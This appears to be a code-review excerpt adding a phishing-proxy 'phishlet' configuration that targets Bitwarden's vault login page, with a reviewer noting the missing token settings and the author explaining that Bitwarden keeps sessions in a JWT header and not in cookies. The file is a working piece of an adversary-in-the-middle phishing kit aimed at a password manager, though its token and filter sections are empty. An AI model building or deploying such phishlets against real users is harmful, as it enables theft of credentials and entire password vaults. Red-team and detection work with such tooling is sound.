phishlets/bitwarden.yaml

```diff
@@ -0,0 +1,38 @@
+author: '@thehackerish'
+min_ver: '2.3.0'
+
+proxy_hosts:
+  - {phish_sub: 'vault', orig_sub: 'vault', domain: 'bitwarden.com', session: true, is_landing: true}
+
+sub_filters: []
+
+auth_tokens: []
```

Comment:
No Token

Reply:
Bitwarden uses JWT in a HTTP header for authentication. Therefore, cookies do not give a clear indication about the session state.